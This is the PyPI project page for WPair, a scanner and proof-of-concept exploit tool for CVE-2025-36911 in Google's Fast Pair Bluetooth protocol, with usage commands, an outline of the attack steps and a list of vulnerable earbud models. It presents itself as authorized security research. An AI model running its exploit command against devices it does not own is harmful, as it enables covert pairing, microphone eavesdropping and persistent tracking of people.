CVE-2025-36911 Fast Pair vulnerability scanner
Project description
WPair - CVE-2025-36911 Fast Pair Vulnerability Scanner
WPair is a defensive security research tool that demonstrates CVE-2025-36911 vulnerability in Google's Fast Pair protocol.
⚠️ SECURITY RESEARCH TOOL - AUTHORIZED USE ONLY ⚠️
This tool is provided for:
- Security research and education
- Testing devices you OWN
- Authorized penetration testing with written permission
Unauthorized access to computer systems is ILLEGAL.
Violators will be prosecuted under applicable laws including:
- Computer Fraud and Abuse Act (USA)
- Computer Misuse Act (UK)
- Similar legislation in your jurisdiction
By using this tool, you agree to use it responsibly and legally.
What is CVE-2025-36911?
CVE-2025-36911 (also known as "WhisperPair") is a vulnerability in Google's Fast Pair protocol that affects millions of Bluetooth audio devices worldwide.
Impact:
- Unauthorized Bluetooth pairing without user consent
- Microphone access via Hands-Free Profile (HFP)
- Persistent device tracking via Account Key injection
CVSS Score: 8.1 (High)
Affected Devices: JBL, Sony, Google Pixel Buds, Anker, Nothing, OnePlus, Beats, Bose, Jabra, Xiaomi, and many others.
Installation
From PyPI (when published)
pip install wpair
From Source
git clone https://github.com/markmysler/wpair-cli.git
cd wpair-cli
pip install -e ".[dev]"
Usage
1. Scan for Fast Pair Devices
Discover nearby Bluetooth devices advertising Fast Pair service:
wpair scan --timeout 30
Options:
--timeout N- Scan duration in seconds (default: 30)--all- Scan all BLE devices, not just Fast Pair
Example output:
┏━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━┳━━━━━━━━━┓
┃ Name ┃ Address ┃ Model ID ┃ Signal ┃ Status ┃
┡━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━╇━━━━━━━━━┩
│ Pixel Buds Pro 2 │ AA:BB:CC:DD:EE:FF│ 30018E │ ████ │ Unknown │
│ Sony WF-1000XM4 │ 11:22:33:44:55:66│ CD8256 │ ███ │ Unknown │
└────────────────────┴──────────────────┴──────────┴────────┴─────────┘
2. Test a Device for Vulnerability (Non-Invasive)
Test if a device is vulnerable without exploiting or pairing:
wpair test AA:BB:CC:DD:EE:FF
This performs a read-only test by sending a Key-Based Pairing request and interpreting the GATT error code. No pairing or modification occurs.
Output:
VULNERABLE- Device accepts unauthenticated pairing requestsPATCHED- Device correctly rejects unauthorized requestsERROR- Test inconclusive (device may already be paired)
3. Exploit (Authorized Testing ONLY)
⚠️ WARNING: This performs actual exploitation. Use only on devices you own.
wpair exploit AA:BB:CC:DD:EE:FF --confirm
The --confirm flag is required and serves as acknowledgment that you own the device or have explicit written permission.
What this does:
- Bypasses Key-Based Pairing authentication
- Establishes Bluetooth Classic bonding
- Writes persistent Account Key to device
- May enable microphone access via HFP profile
4. About CVE-2025-36911
Display detailed information about the vulnerability:
wpair about
Features
| Feature | Description |
|---|---|
| BLE Scanner | Discovers Fast Pair devices broadcasting the 0xFE2C service UUID |
| Vulnerability Tester | Non-invasive check if device is patched against CVE-2025-36911 |
| Exploit Demonstration | Full proof-of-concept for authorized security testing |
| Device Database | 20+ known vulnerable device models with quirks handling |
| Multi-Strategy Exploitation | 4 different KBP request strategies with automatic fallback |
| Progress Tracking | Real-time progress display with Rich terminal UI |
How It Works
Attack Overview
The vulnerability exploits weaknesses in Google's Fast Pair Key-Based Pairing (KBP) protocol:
- Discovery: Scan for devices advertising Fast Pair service (UUID 0xFE2C)
- KBP Request: Send unauthenticated Key-Based Pairing request
- Address Extraction: Parse BR/EDR address from response
- Classic Bonding: Pair via Bluetooth Classic
- Account Key Injection: Write persistent tracking identifier
Technical Details
- Protocol: Google Fast Pair (GATT-based BLE service)
- Vulnerability: Insufficient authentication in Key-Based Pairing
- Crypto: ECDH (secp256r1) + AES-ECB
- Persistence: Account Key stored in device NVRAM
Known Vulnerable Devices
WPair includes a database of 20+ confirmed vulnerable devices:
- Google Pixel Buds (multiple models)
- Sony WF-1000XM4, WH-1000XM5
- JBL Tune Buds, Live Pro 2
- Nothing Ear, Ear (a), Ear (2)
- OnePlus Buds Pro 2
- Beats Studio Buds+
- Anker Soundcore Liberty 4 NC
See wpair/database/known_devices.py for full list.
Architecture
wpair/
├── core/ # Core functionality
│ ├── device.py # Device data models
│ ├── scanner.py # BLE scanner
│ ├── vulnerability_tester.py # Non-invasive testing
│ └── exploit.py # Exploitation engine
├── bluetooth/ # Bluetooth adapters
│ └── classic_adapter.py # BR/EDR pairing
├── crypto/ # Cryptography
│ ├── ecdh.py # ECDH key exchange
│ └── aes.py # AES encryption
├── database/ # Known devices database
├── ui/ # User interface
│ └── terminal.py # Rich-based TUI
└── cli.py # Click-based CLI
Legal and Ethical Usage
⚠️ CRITICAL: Read Before Use
This tool is for AUTHORIZED security testing ONLY.
✅ Allowed:
- Testing your own devices
- Authorized penetration testing with written permission
- Academic security research in controlled environments
- Defensive security to identify vulnerable devices
❌ FORBIDDEN:
- Testing devices you do not own
- Unauthorized access to any device
- Malicious use or privacy violations
Legal Consequences
Unauthorized access to Bluetooth devices is ILLEGAL under:
- USA: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
- UK: Computer Misuse Act 1990
- EU: Directive 2013/40/EU
- Similar legislation worldwide
By using this tool, you agree to use it only on devices you own or have explicit written permission to test.
Development
Setup Development Environment
python -m venv venv
source venv/bin/activate # or venv\Scripts\activate on Windows
pip install -e ".[dev]"
Run Tests
pytest
Code Formatting
black wpair/
ruff check wpair/
Type Checking
mypy wpair/
Credits
Original Research Team - KU Leuven, Belgium
| Researcher | Affiliation |
|---|---|
| Sayon Duttagupta | COSIC Group |
| Nikola Antonijević | COSIC Group |
| Bart Preneel | COSIC Group |
| Seppe Wyns | DistriNet Group |
| Dave Singelée | DistriNet Group |
Funding: Flemish Government Cybersecurity Research Program (VOEWICS02)
Resources:
License
This project is licensed under the Apache License 2.0 - see the LICENSE file for details.
Disclaimer
This application is an independent implementation created for security research purposes. The original KU Leuven researchers discovered and disclosed the vulnerability but have not released any code and are not affiliated with this project. Their inclusion in credits is solely to acknowledge their research contribution.
Built for the security research community.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file wpair-1.0.0.tar.gz.
File metadata
- Download URL: wpair-1.0.0.tar.gz
- Upload date:
- Size: 43.6 kB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.7
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
08046320eb22bd0ab7a3367a7b58acea050683a50e646cf4e6e15d472894943c
|
|
| MD5 |
bec309fe11234f441eb4578961c8b510
|
|
| BLAKE2b-256 |
3c33b389e8106a953e063258f1e0e40f3a45ed638a6e5398501820e46de7222d
|
Provenance
The following attestation bundles were made for wpair-1.0.0.tar.gz:
Publisher:
python-publish.yml on markmysler/wpair-cli
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
wpair-1.0.0.tar.gz -
Subject digest:
08046320eb22bd0ab7a3367a7b58acea050683a50e646cf4e6e15d472894943c - Sigstore transparency entry: 834897030
- Sigstore integration time:
-
Permalink:
markmysler/wpair-cli@57add1e6c070223757f8ad74328b4f693199b9d9 -
Branch / Tag:
refs/tags/1.0.0 - Owner: https://github.com/markmysler
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
python-publish.yml@57add1e6c070223757f8ad74328b4f693199b9d9 -
Trigger Event:
release
-
Statement type:
File details
Details for the file wpair-1.0.0-py3-none-any.whl.
File metadata
- Download URL: wpair-1.0.0-py3-none-any.whl
- Upload date:
- Size: 26.9 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.7
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
cbd31a26e0f0c6c44b880134ed7c648689f1000385b2d1d2c66e297a763e3dd6
|
|
| MD5 |
767f9a61a3820426ca36041b982643ba
|
|
| BLAKE2b-256 |
bd1d098a441c30da323212b1f464e8aea38f0bb05d3482d0fe40611ba6b0c7e7
|
Provenance
The following attestation bundles were made for wpair-1.0.0-py3-none-any.whl:
Publisher:
python-publish.yml on markmysler/wpair-cli
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
wpair-1.0.0-py3-none-any.whl -
Subject digest:
cbd31a26e0f0c6c44b880134ed7c648689f1000385b2d1d2c66e297a763e3dd6 - Sigstore transparency entry: 834897049
- Sigstore integration time:
-
Permalink:
markmysler/wpair-cli@57add1e6c070223757f8ad74328b4f693199b9d9 -
Branch / Tag:
refs/tags/1.0.0 - Owner: https://github.com/markmysler
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
python-publish.yml@57add1e6c070223757f8ad74328b4f693199b9d9 -
Trigger Event:
release
-
Statement type:
